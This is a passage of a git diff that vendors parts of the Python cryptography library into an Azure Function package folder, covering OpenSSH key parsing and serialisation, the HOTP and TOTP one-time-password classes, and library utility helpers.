b"-cert-v01@openssh.com" + +_SSH_PUBKEY_RC = re.compile(rb"\A(\S+)[ \t]+(\S+)") +_SK_MAGIC = b"openssh-key-v1\0" +_SK_START = b"-----BEGIN OPENSSH PRIVATE KEY-----" +_SK_END = b"-----END OPENSSH PRIVATE KEY-----" +_BCRYPT = b"bcrypt" +_NONE = b"none" +_DEFAULT_CIPHER = b"aes256-ctr" +_DEFAULT_ROUNDS = 16 +_MAX_PASSWORD = 72 + +# re is only way to work on bytes-like data +_PEM_RC = re.compile(_SK_START + b"(.*?)" + _SK_END, re.DOTALL) + +# padding for max blocksize +_PADDING = memoryview(bytearray(range(1, 1 + 16))) + +# ciphers that are actually used in key wrapping +_SSH_CIPHERS: typing.Dict[ + bytes, + typing.Tuple[ + typing.Type[algorithms.AES], + int, + typing.Union[typing.Type[modes.CTR], typing.Type[modes.CBC]], + int, + ], +] = { + b"aes256-ctr": (algorithms.AES, 32, modes.CTR, 16), + b"aes256-cbc": (algorithms.AES, 32, modes.CBC, 16), +} + +# map local curve name to key type +_ECDSA_KEY_TYPE = { + "secp256r1": _ECDSA_NISTP256, + "secp384r1": _ECDSA_NISTP384, + "secp521r1": _ECDSA_NISTP521, +} + + +def _ecdsa_key_type(public_key: ec.EllipticCurvePublicKey) -> bytes: + """Return SSH key_type and curve_name for private key.""" + curve = public_key.curve + if curve.name not in _ECDSA_KEY_TYPE: + raise ValueError( + f"Unsupported curve for ssh private key: {curve.name!r}" + ) + return _ECDSA_KEY_TYPE[curve.name] + + +def _ssh_pem_encode( + data: bytes, + prefix: bytes = _SK_START + b"\n", + suffix: bytes = _SK_END + b"\n", +) -> bytes: + return b"".join([prefix, _base64_encode(data), suffix]) + + +def _check_block_size(data: bytes, block_len: int) -> None: + """Require data to be full blocks""" + if not data or len(data) % block_len != 0: + raise ValueError("Corrupt data: missing padding") + + +def _check_empty(data: bytes) -> None: + """All data should have been parsed.""" + if data: + raise ValueError("Corrupt data: unparsed data") + + +def _init_cipher( + ciphername: bytes, + password: typing.Optional[bytes], + salt: bytes, + rounds: int, +) -> Cipher[typing.Union[modes.CBC, modes.CTR]]: + """Generate key + iv and return cipher.""" + if not password: + raise ValueError("Key is password-protected.") + + algo, key_len, mode, iv_len = _SSH_CIPHERS[ciphername] + seed = _bcrypt_kdf(password, salt, key_len + iv_len, rounds, True) + return Cipher(algo(seed[:key_len]), mode(seed[key_len:])) + + +def _get_u32(data: memoryview) -> typing.Tuple[int, memoryview]: + """Uint32""" + if len(data) < 4: + raise ValueError("Invalid data") + return int.from_bytes(data[:4], byteorder="big"), data[4:] + + +def _get_u64(data: memoryview) -> typing.Tuple[int, memoryview]: + """Uint64""" + if len(data) < 8: + raise ValueError("Invalid data") + return int.from_bytes(data[:8], byteorder="big"), data[8:] + + +def _get_sshstr(data: memoryview) -> typing.Tuple[memoryview, memoryview]: + """Bytes with u32 length prefix""" + n, data = _get_u32(data) + if n > len(data): + raise ValueError("Invalid data") + return data[:n], data[n:] + + +def _get_mpint(data: memoryview) -> typing.Tuple[int, memoryview]: + """Big integer.""" + val, data = _get_sshstr(data) + if val and val[0] > 0x7F: + raise ValueError("Invalid data") + return int.from_bytes(val, "big"), data + + +def _to_mpint(val: int) -> bytes: + """Storage format for signed bigint.""" + if val < 0: + raise ValueError("negative mpint not allowed") + if not val: + return b"" + nbytes = (val.bit_length() + 8) // 8 + return utils.int_to_bytes(val, nbytes) + + +class _FragList: + """Build recursive structure without data copy.""" + + flist: typing.List[bytes] + + def __init__(self, init: typing.List[bytes] = None) -> None: + self.flist = [] + if init: + self.flist.extend(init) + + def put_raw(self, val: bytes) -> None: + """Add plain bytes""" + self.flist.append(val) + + def put_u32(self, val: int) -> None: + """Big-endian uint32""" + self.flist.append(val.to_bytes(length=4, byteorder="big")) + + def put_sshstr(self, val: typing.Union[bytes, "_FragList"]) -> None: + """Bytes prefixed with u32 length""" + if isinstance(val, (bytes, memoryview, bytearray)): + self.put_u32(len(val)) + self.flist.append(val) + else: + self.put_u32(val.size()) + self.flist.extend(val.flist) + + def put_mpint(self, val: int) -> None: + """Big-endian bigint prefixed with u32 length""" + self.put_sshstr(_to_mpint(val)) + + def size(self) -> int: + """Current number of bytes""" + return sum(map(len, self.flist)) + + def render(self, dstbuf: memoryview, pos: int = 0) -> int: + """Write into bytearray""" + for frag in self.flist: + flen = len(frag) + start, pos = pos, pos + flen + dstbuf[start:pos] = frag + return pos + + def tobytes(self) -> bytes: + """Return as bytes""" + buf = memoryview(bytearray(self.size())) + self.render(buf) + return buf.tobytes() + + +class _SSHFormatRSA: + """Format for RSA keys. + + Public: + mpint e, n + Private: + mpint n, e, d, iqmp, p, q + """ + + def get_public(self, data: memoryview): + """RSA public fields""" + e, data = _get_mpint(data) + n, data = _get_mpint(data) + return (e, n), data + + def load_public( + self, data: memoryview + ) -> typing.Tuple[rsa.RSAPublicKey, memoryview]: + """Make RSA public key from data.""" + (e, n), data = self.get_public(data) + public_numbers = rsa.RSAPublicNumbers(e, n) + public_key = public_numbers.public_key() + return public_key, data + + def load_private( + self, data: memoryview, pubfields + ) -> typing.Tuple[rsa.RSAPrivateKey, memoryview]: + """Make RSA private key from data.""" + n, data = _get_mpint(data) + e, data = _get_mpint(data) + d, data = _get_mpint(data) + iqmp, data = _get_mpint(data) + p, data = _get_mpint(data) + q, data = _get_mpint(data) + + if (e, n) != pubfields: + raise ValueError("Corrupt data: rsa field mismatch") + dmp1 = rsa.rsa_crt_dmp1(d, p) + dmq1 = rsa.rsa_crt_dmq1(d, q) + public_numbers = rsa.RSAPublicNumbers(e, n) + private_numbers = rsa.RSAPrivateNumbers( + p, q, d, dmp1, dmq1, iqmp, public_numbers + ) + private_key = private_numbers.private_key() + return private_key, data + + def encode_public( + self, public_key: rsa.RSAPublicKey, f_pub: _FragList + ) -> None: + """Write RSA public key""" + pubn = public_key.public_numbers() + f_pub.put_mpint(pubn.e) + f_pub.put_mpint(pubn.n) + + def encode_private( + self, private_key: rsa.RSAPrivateKey, f_priv: _FragList + ) -> None: + """Write RSA private key""" + private_numbers = private_key.private_numbers() + public_numbers = private_numbers.public_numbers + + f_priv.put_mpint(public_numbers.n) + f_priv.put_mpint(public_numbers.e) + + f_priv.put_mpint(private_numbers.d) + f_priv.put_mpint(private_numbers.iqmp) + f_priv.put_mpint(private_numbers.p) + f_priv.put_mpint(private_numbers.q) + + +class _SSHFormatDSA: + """Format for DSA keys. + + Public: + mpint p, q, g, y + Private: + mpint p, q, g, y, x + """ + + def get_public( + self, data: memoryview + ) -> typing.Tuple[typing.Tuple, memoryview]: + """DSA public fields""" + p, data = _get_mpint(data) + q, data = _get_mpint(data) + g, data = _get_mpint(data) + y, data = _get_mpint(data) + return (p, q, g, y), data + + def load_public( + self, data: memoryview + ) -> typing.Tuple[dsa.DSAPublicKey, memoryview]: + """Make DSA public key from data.""" + (p, q, g, y), data = self.get_public(data) + parameter_numbers = dsa.DSAParameterNumbers(p, q, g) + public_numbers = dsa.DSAPublicNumbers(y, parameter_numbers) + self._validate(public_numbers) + public_key = public_numbers.public_key() + return public_key, data + + def load_private( + self, data: memoryview, pubfields + ) -> typing.Tuple[dsa.DSAPrivateKey, memoryview]: + """Make DSA private key from data.""" + (p, q, g, y), data = self.get_public(data) + x, data = _get_mpint(data) + + if (p, q, g, y) != pubfields: + raise ValueError("Corrupt data: dsa field mismatch") + parameter_numbers = dsa.DSAParameterNumbers(p, q, g) + public_numbers = dsa.DSAPublicNumbers(y, parameter_numbers) + self._validate(public_numbers) + private_numbers = dsa.DSAPrivateNumbers(x, public_numbers) + private_key = private_numbers.private_key() + return private_key, data + + def encode_public( + self, public_key: dsa.DSAPublicKey, f_pub: _FragList + ) -> None: + """Write DSA public key""" + public_numbers = public_key.public_numbers() + parameter_numbers = public_numbers.parameter_numbers + self._validate(public_numbers) + + f_pub.put_mpint(parameter_numbers.p) + f_pub.put_mpint(parameter_numbers.q) + f_pub.put_mpint(parameter_numbers.g) + f_pub.put_mpint(public_numbers.y) + + def encode_private( + self, private_key: dsa.DSAPrivateKey, f_priv: _FragList + ) -> None: + """Write DSA private key""" + self.encode_public(private_key.public_key(), f_priv) + f_priv.put_mpint(private_key.private_numbers().x) + + def _validate(self, public_numbers: dsa.DSAPublicNumbers) -> None: + parameter_numbers = public_numbers.parameter_numbers + if parameter_numbers.p.bit_length() != 1024: + raise ValueError("SSH supports only 1024 bit DSA keys") + + +class _SSHFormatECDSA: + """Format for ECDSA keys. + + Public: + str curve + bytes point + Private: + str curve + bytes point + mpint secret + """ + + def __init__(self, ssh_curve_name: bytes, curve: ec.EllipticCurve): + self.ssh_curve_name = ssh_curve_name + self.curve = curve + + def get_public( + self, data: memoryview + ) -> typing.Tuple[typing.Tuple, memoryview]: + """ECDSA public fields""" + curve, data = _get_sshstr(data) + point, data = _get_sshstr(data) + if curve != self.ssh_curve_name: + raise ValueError("Curve name mismatch") + if point[0] != 4: + raise NotImplementedError("Need uncompressed point") + return (curve, point), data + + def load_public( + self, data: memoryview + ) -> typing.Tuple[ec.EllipticCurvePublicKey, memoryview]: + """Make ECDSA public key from data.""" + (curve_name, point), data = self.get_public(data) + public_key = ec.EllipticCurvePublicKey.from_encoded_point( + self.curve, point.tobytes() + ) + return public_key, data + + def load_private( + self, data: memoryview, pubfields + ) -> typing.Tuple[ec.EllipticCurvePrivateKey, memoryview]: + """Make ECDSA private key from data.""" + (curve_name, point), data = self.get_public(data) + secret, data = _get_mpint(data) + + if (curve_name, point) != pubfields: + raise ValueError("Corrupt data: ecdsa field mismatch") + private_key = ec.derive_private_key(secret, self.curve) + return private_key, data + + def encode_public( + self, public_key: ec.EllipticCurvePublicKey, f_pub: _FragList + ) -> None: + """Write ECDSA public key""" + point = public_key.public_bytes( + Encoding.X962, PublicFormat.UncompressedPoint + ) + f_pub.put_sshstr(self.ssh_curve_name) + f_pub.put_sshstr(point) + + def encode_private( + self, private_key: ec.EllipticCurvePrivateKey, f_priv: _FragList + ) -> None: + """Write ECDSA private key""" + public_key = private_key.public_key() + private_numbers = private_key.private_numbers() + + self.encode_public(public_key, f_priv) + f_priv.put_mpint(private_numbers.private_value) + + +class _SSHFormatEd25519: + """Format for Ed25519 keys. + + Public: + bytes point + Private: + bytes point + bytes secret_and_point + """ + + def get_public( + self, data: memoryview + ) -> typing.Tuple[typing.Tuple, memoryview]: + """Ed25519 public fields""" + point, data = _get_sshstr(data) + return (point,), data + + def load_public( + self, data: memoryview + ) -> typing.Tuple[ed25519.Ed25519PublicKey, memoryview]: + """Make Ed25519 public key from data.""" + (point,), data = self.get_public(data) + public_key = ed25519.Ed25519PublicKey.from_public_bytes( + point.tobytes() + ) + return public_key, data + + def load_private( + self, data: memoryview, pubfields + ) -> typing.Tuple[ed25519.Ed25519PrivateKey, memoryview]: + """Make Ed25519 private key from data.""" + (point,), data = self.get_public(data) + keypair, data = _get_sshstr(data) + + secret = keypair[:32] + point2 = keypair[32:] + if point != point2 or (point,) != pubfields: + raise ValueError("Corrupt data: ed25519 field mismatch") + private_key = ed25519.Ed25519PrivateKey.from_private_bytes(secret) + return private_key, data + + def encode_public( + self, public_key: ed25519.Ed25519PublicKey, f_pub: _FragList + ) -> None: + """Write Ed25519 public key""" + raw_public_key = public_key.public_bytes( + Encoding.Raw, PublicFormat.Raw + ) + f_pub.put_sshstr(raw_public_key) + + def encode_private( + self, private_key: ed25519.Ed25519PrivateKey, f_priv: _FragList + ) -> None: + """Write Ed25519 private key""" + public_key = private_key.public_key() + raw_private_key = private_key.private_bytes( + Encoding.Raw, PrivateFormat.Raw, NoEncryption() + ) + raw_public_key = public_key.public_bytes( + Encoding.Raw, PublicFormat.Raw + ) + f_keypair = _FragList([raw_private_key, raw_public_key]) + + self.encode_public(public_key, f_priv) + f_priv.put_sshstr(f_keypair) + + +_KEY_FORMATS = { + _SSH_RSA: _SSHFormatRSA(), + _SSH_DSA: _SSHFormatDSA(), + _SSH_ED25519: _SSHFormatEd25519(), + _ECDSA_NISTP256: _SSHFormatECDSA(b"nistp256", ec.SECP256R1()), + _ECDSA_NISTP384: _SSHFormatECDSA(b"nistp384", ec.SECP384R1()), + _ECDSA_NISTP521: _SSHFormatECDSA(b"nistp521", ec.SECP521R1()), +} + + +def _lookup_kformat(key_type: bytes): + """Return valid format or throw error""" + if not isinstance(key_type, bytes): + key_type = memoryview(key_type).tobytes() + if key_type in _KEY_FORMATS: + return _KEY_FORMATS[key_type] + raise UnsupportedAlgorithm(f"Unsupported key type: {key_type!r}") + + +_SSH_PRIVATE_KEY_TYPES = typing.Union[ + ec.EllipticCurvePrivateKey, + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ed25519.Ed25519PrivateKey, +] + + +def load_ssh_private_key( + data: bytes, + password: typing.Optional[bytes], + backend: typing.Any = None, +) -> _SSH_PRIVATE_KEY_TYPES: + """Load private key from OpenSSH custom encoding.""" + utils._check_byteslike("data", data) + if password is not None: + utils._check_bytes("password", password) + + m = _PEM_RC.search(data) + if not m: + raise ValueError("Not OpenSSH private key format") + p1 = m.start(1) + p2 = m.end(1) + data = binascii.a2b_base64(memoryview(data)[p1:p2]) + if not data.startswith(_SK_MAGIC): + raise ValueError("Not OpenSSH private key format") + data = memoryview(data)[len(_SK_MAGIC) :] + + # parse header + ciphername, data = _get_sshstr(data) + kdfname, data = _get_sshstr(data) + kdfoptions, data = _get_sshstr(data) + nkeys, data = _get_u32(data) + if nkeys != 1: + raise ValueError("Only one key supported") + + # load public key data + pubdata, data = _get_sshstr(data) + pub_key_type, pubdata = _get_sshstr(pubdata) + kformat = _lookup_kformat(pub_key_type) + pubfields, pubdata = kformat.get_public(pubdata) + _check_empty(pubdata) + + # load secret data + edata, data = _get_sshstr(data) + _check_empty(data) + + if (ciphername, kdfname) != (_NONE, _NONE): + ciphername_bytes = ciphername.tobytes() + if ciphername_bytes not in _SSH_CIPHERS: + raise UnsupportedAlgorithm( + f"Unsupported cipher: {ciphername_bytes!r}" + ) + if kdfname != _BCRYPT: + raise UnsupportedAlgorithm(f"Unsupported KDF: {kdfname!r}") + blklen = _SSH_CIPHERS[ciphername_bytes][3] + _check_block_size(edata, blklen) + salt, kbuf = _get_sshstr(kdfoptions) + rounds, kbuf = _get_u32(kbuf) + _check_empty(kbuf) + ciph = _init_cipher(ciphername_bytes, password, salt.tobytes(), rounds) + edata = memoryview(ciph.decryptor().update(edata)) + else: + blklen = 8 + _check_block_size(edata, blklen) + ck1, edata = _get_u32(edata) + ck2, edata = _get_u32(edata) + if ck1 != ck2: + raise ValueError("Corrupt data: broken checksum") + + # load per-key struct + key_type, edata = _get_sshstr(edata) + if key_type != pub_key_type: + raise ValueError("Corrupt data: key type mismatch") + private_key, edata = kformat.load_private(edata, pubfields) + comment, edata = _get_sshstr(edata) + + # yes, SSH does padding check *after* all other parsing is done. + # need to follow as it writes zero-byte padding too. + if edata != _PADDING[: len(edata)]: + raise ValueError("Corrupt data: invalid padding") + + return private_key + + +def serialize_ssh_private_key( + private_key: _SSH_PRIVATE_KEY_TYPES, + password: typing.Optional[bytes] = None, +) -> bytes: + """Serialize private key with OpenSSH custom encoding.""" + if password is not None: + utils._check_bytes("password", password) + if password and len(password) > _MAX_PASSWORD: + raise ValueError( + "Passwords longer than 72 bytes are not supported by " + "OpenSSH private key format" + ) + + if isinstance(private_key, ec.EllipticCurvePrivateKey): + key_type = _ecdsa_key_type(private_key.public_key()) + elif isinstance(private_key, rsa.RSAPrivateKey): + key_type = _SSH_RSA + elif isinstance(private_key, dsa.DSAPrivateKey): + key_type = _SSH_DSA + elif isinstance(private_key, ed25519.Ed25519PrivateKey): + key_type = _SSH_ED25519 + else: + raise ValueError("Unsupported key type") + kformat = _lookup_kformat(key_type) + + # setup parameters + f_kdfoptions = _FragList() + if password: + ciphername = _DEFAULT_CIPHER + blklen = _SSH_CIPHERS[ciphername][3] + kdfname = _BCRYPT + rounds = _DEFAULT_ROUNDS + salt = os.urandom(16) + f_kdfoptions.put_sshstr(salt) + f_kdfoptions.put_u32(rounds) + ciph = _init_cipher(ciphername, password, salt, rounds) + else: + ciphername = kdfname = _NONE + blklen = 8 + ciph = None + nkeys = 1 + checkval = os.urandom(4) + comment = b"" + + # encode public and private parts together + f_public_key = _FragList() + f_public_key.put_sshstr(key_type) + kformat.encode_public(private_key.public_key(), f_public_key) + + f_secrets = _FragList([checkval, checkval]) + f_secrets.put_sshstr(key_type) + kformat.encode_private(private_key, f_secrets) + f_secrets.put_sshstr(comment) + f_secrets.put_raw(_PADDING[: blklen - (f_secrets.size() % blklen)]) + + # top-level structure + f_main = _FragList() + f_main.put_raw(_SK_MAGIC) + f_main.put_sshstr(ciphername) + f_main.put_sshstr(kdfname) + f_main.put_sshstr(f_kdfoptions) + f_main.put_u32(nkeys) + f_main.put_sshstr(f_public_key) + f_main.put_sshstr(f_secrets) + + # copy result info bytearray + slen = f_secrets.size() + mlen = f_main.size() + buf = memoryview(bytearray(mlen + blklen)) + f_main.render(buf) + ofs = mlen - slen + + # encrypt in-place + if ciph is not None: + ciph.encryptor().update_into(buf[ofs:mlen], buf[ofs:]) + + txt = _ssh_pem_encode(buf[:mlen]) + buf[ofs:mlen] = bytearray(slen) + return txt + + +_SSH_PUBLIC_KEY_TYPES = typing.Union[ + ec.EllipticCurvePublicKey, + rsa.RSAPublicKey, + dsa.DSAPublicKey, + ed25519.Ed25519PublicKey, +] + + +def load_ssh_public_key( + data: bytes, backend: typing.Any = None +) -> _SSH_PUBLIC_KEY_TYPES: + """Load public key from OpenSSH one-line format.""" + utils._check_byteslike("data", data) + + m = _SSH_PUBKEY_RC.match(data) + if not m: + raise ValueError("Invalid line format") + key_type = orig_key_type = m.group(1) + key_body = m.group(2) + with_cert = False + if _CERT_SUFFIX == key_type[-len(_CERT_SUFFIX) :]: + with_cert = True + key_type = key_type[: -len(_CERT_SUFFIX)] + kformat = _lookup_kformat(key_type) + + try: + rest = memoryview(binascii.a2b_base64(key_body)) + except (TypeError, binascii.Error): + raise ValueError("Invalid key format") + + inner_key_type, rest = _get_sshstr(rest) + if inner_key_type != orig_key_type: + raise ValueError("Invalid key format") + if with_cert: + nonce, rest = _get_sshstr(rest) + public_key, rest = kformat.load_public(rest) + if with_cert: + serial, rest = _get_u64(rest) + cctype, rest = _get_u32(rest) + key_id, rest = _get_sshstr(rest) + principals, rest = _get_sshstr(rest) + valid_after, rest = _get_u64(rest) + valid_before, rest = _get_u64(rest) + crit_options, rest = _get_sshstr(rest) + extensions, rest = _get_sshstr(rest) + reserved, rest = _get_sshstr(rest) + sig_key, rest = _get_sshstr(rest) + signature, rest = _get_sshstr(rest) + _check_empty(rest) + return public_key + + +def serialize_ssh_public_key(public_key: _SSH_PUBLIC_KEY_TYPES) -> bytes: + """One-line public key format for OpenSSH""" + if isinstance(public_key, ec.EllipticCurvePublicKey): + key_type = _ecdsa_key_type(public_key) + elif isinstance(public_key, rsa.RSAPublicKey): + key_type = _SSH_RSA + elif isinstance(public_key, dsa.DSAPublicKey): + key_type = _SSH_DSA + elif isinstance(public_key, ed25519.Ed25519PublicKey): + key_type = _SSH_ED25519 + else: + raise ValueError("Unsupported key type") + kformat = _lookup_kformat(key_type) + + f_pub = _FragList() + f_pub.put_sshstr(key_type) + kformat.encode_public(public_key, f_pub) + + pub = binascii.b2a_base64(f_pub.tobytes()).strip() + return b"".join([key_type, b" ", pub]) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__init__.py new file mode 100644 index 0000000..3ba7994 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__init__.py @@ -0,0 +1,7 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +class InvalidToken(Exception): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3222181 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/hotp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/hotp.cpython-39.pyc new file mode 100644 index 0000000..77ea37b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/hotp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/totp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/totp.cpython-39.pyc new file mode 100644 index 0000000..8f70d26 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/__pycache__/totp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/hotp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/hotp.py new file mode 100644 index 0000000..ea0a789 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/hotp.py @@ -0,0 +1,92 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import base64 +import typing +from urllib.parse import quote, urlencode + +from cryptography.hazmat.primitives import constant_time, hmac +from cryptography.hazmat.primitives.hashes import SHA1, SHA256, SHA512 +from cryptography.hazmat.primitives.twofactor import InvalidToken + + +_ALLOWED_HASH_TYPES = typing.Union[SHA1, SHA256, SHA512] + + +def _generate_uri( + hotp: "HOTP", + type_name: str, + account_name: str, + issuer: typing.Optional[str], + extra_parameters: typing.List[typing.Tuple[str, int]], +) -> str: + parameters = [ + ("digits", hotp._length), + ("secret", base64.b32encode(hotp._key)), + ("algorithm", hotp._algorithm.name.upper()), + ] + + if issuer is not None: + parameters.append(("issuer", issuer)) + + parameters.extend(extra_parameters) + + label = ( + f"{quote(issuer)}:{quote(account_name)}" + if issuer + else quote(account_name) + ) + return f"otpauth://{type_name}/{label}?{urlencode(parameters)}" + + +class HOTP: + def __init__( + self, + key: bytes, + length: int, + algorithm: _ALLOWED_HASH_TYPES, + backend: typing.Any = None, + enforce_key_length: bool = True, + ) -> None: + if len(key) < 16 and enforce_key_length is True: + raise ValueError("Key length has to be at least 128 bits.") + + if not isinstance(length, int): + raise TypeError("Length parameter must be an integer type.") + + if length < 6 or length > 8: + raise ValueError("Length of HOTP has to be between 6 to 8.") + + if not isinstance(algorithm, (SHA1, SHA256, SHA512)): + raise TypeError("Algorithm must be SHA1, SHA256 or SHA512.") + + self._key = key + self._length = length + self._algorithm = algorithm + + def generate(self, counter: int) -> bytes: + truncated_value = self._dynamic_truncate(counter) + hotp = truncated_value % (10**self._length) + return "{0:0{1}}".format(hotp, self._length).encode() + + def verify(self, hotp: bytes, counter: int) -> None: + if not constant_time.bytes_eq(self.generate(counter), hotp): + raise InvalidToken("Supplied HOTP value does not match.") + + def _dynamic_truncate(self, counter: int) -> int: + ctx = hmac.HMAC(self._key, self._algorithm) + ctx.update(counter.to_bytes(length=8, byteorder="big")) + hmac_value = ctx.finalize() + + offset = hmac_value[len(hmac_value) - 1] & 0b1111 + p = hmac_value[offset : offset + 4] + return int.from_bytes(p, byteorder="big") & 0x7FFFFFFF + + def get_provisioning_uri( + self, account_name: str, counter: int, issuer: typing.Optional[str] + ) -> str: + return _generate_uri( + self, "hotp", account_name, issuer, [("counter", int(counter))] + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/totp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/totp.py new file mode 100644 index 0000000..32c6a0e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/twofactor/totp.py @@ -0,0 +1,48 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.hazmat.primitives import constant_time +from cryptography.hazmat.primitives.twofactor import InvalidToken +from cryptography.hazmat.primitives.twofactor.hotp import ( + HOTP, + _ALLOWED_HASH_TYPES, + _generate_uri, +) + + +class TOTP: + def __init__( + self, + key: bytes, + length: int, + algorithm: _ALLOWED_HASH_TYPES, + time_step: int, + backend: typing.Any = None, + enforce_key_length: bool = True, + ): + self._time_step = time_step + self._hotp = HOTP( + key, length, algorithm, enforce_key_length=enforce_key_length + ) + + def generate(self, time: typing.Union[int, float]) -> bytes: + counter = int(time / self._time_step) + return self._hotp.generate(counter) + + def verify(self, totp: bytes, time: int) -> None: + if not constant_time.bytes_eq(self.generate(time), totp): + raise InvalidToken("Supplied TOTP value does not match.") + + def get_provisioning_uri( + self, account_name: str, issuer: typing.Optional[str] + ) -> str: + return _generate_uri( + self._hotp, + "totp", + account_name, + issuer, + [("period", int(self._time_step))], + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/utils.py new file mode 100644 index 0000000..6e107d4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/utils.py @@ -0,0 +1,180 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import enum +import inspect +import sys +import types +import typing +import warnings + + +# We use a UserWarning subclass, instead of DeprecationWarning, because CPython +# decided deprecation warnings should be invisble by default. +class CryptographyDeprecationWarning(UserWarning): + pass + + +# Several APIs were deprecated with no specific end-of-life date because of the +# ubiquity of their use. They should not be removed until we agree on when that +# cycle ends. +PersistentlyDeprecated2019 = CryptographyDeprecationWarning +DeprecatedIn35 = CryptographyDeprecationWarning +DeprecatedIn36 = CryptographyDeprecationWarning +DeprecatedIn37 = CryptographyDeprecationWarning + + +def _check_bytes(name: str, value: bytes) -> None: + if not isinstance(value, bytes): + raise TypeError("{} must be bytes".format(name)) + + +def _check_byteslike(name: str, value: bytes) -> None: + try: + memoryview(value) + except TypeError: + raise TypeError("{} must be bytes-like".format(name)) + + +if typing.TYPE_CHECKING: + from typing_extensions import Protocol + + _T_class = typing.TypeVar("_T_class", bound=type) + + class _RegisterDecoratorType(Protocol): + def __call__( + self, klass: _T_class, *, check_annotations: bool = False + ) -> _T_class: + ... + + +def register_interface(iface: abc.ABCMeta) -> "_RegisterDecoratorType": + def register_decorator( + klass: "_T_class", *, check_annotations: bool = False + ) -> "_T_class": + verify_interface(iface, klass, check_annotations=check_annotations) + iface.register(klass) + return klass + + return register_decorator + + +def int_to_bytes(integer: int, length: typing.Optional[int] = None) -> bytes: + return integer.to_bytes( + length or (integer.bit_length() + 7) // 8 or 1, "big" + ) + + +class InterfaceNotImplemented(Exception): + pass + + +def strip_annotation(signature: inspect.Signature) -> inspect.Signature: + return inspect.Signature( + [ + param.replace(annotation=inspect.Parameter.empty) + for param in signature.parameters.values() + ] + ) + + +def verify_interface( + iface: abc.ABCMeta, klass: object, *, check_annotations: bool = False +): + for method in iface.__abstractmethods__: + if not hasattr(klass, method): + raise InterfaceNotImplemented( + "{} is missing a {!r} method".format(klass, method) + ) + if isinstance(getattr(iface, method), abc.abstractproperty): + # Can't properly verify these yet. + continue + sig = inspect.signature(getattr(iface, method)) + actual = inspect.signature(getattr(klass, method)) + if check_annotations: + ok = sig == actual + else: + ok = strip_annotation(sig) == strip_annotation(actual) + if not ok: + raise InterfaceNotImplemented( + "{}.{}'s signature differs from the expected. Expected: " + "{!r}. Received: {!r}".format(klass, method, sig, actual) + ) + + +class _DeprecatedValue: + def __init__(self, value: object, message: str, warning_class): + self.value = value + self.message = message + self.warning_class = warning_class + + +class _ModuleWithDeprecations(types.ModuleType): + def __init__(self, module: types.ModuleType): + super().__init__(module.__name__) + self.__dict__["_module"] = module + + def __getattr__(self, attr: str) -> object: + obj = getattr(self._module, attr) + if isinstance(obj, _DeprecatedValue): + warnings.warn(obj.message, obj.warning_class, stacklevel=2) + obj = obj.value + return obj + + def __setattr__(self, attr: str, value: object) -> None: + setattr(self._module, attr, value) + + def __delattr__(self, attr: str) -> None: + obj = getattr(self._module, attr) + if isinstance(obj, _DeprecatedValue): + warnings.warn(obj.message, obj.warning_class, stacklevel=2) + + delattr(self._module, attr) + + def __dir__(self) -> typing.Sequence[str]: + return ["_module"] + dir(self._module) + + +def deprecated( + value: object, + module_name: str, + message: str, + warning_class: typing.Type[Warning], + name: typing.Optional[str] = None, +) -> _DeprecatedValue: + module = sys.modules[module_name] + if not isinstance(module, _ModuleWithDeprecations): + sys.modules[module_name] = module = 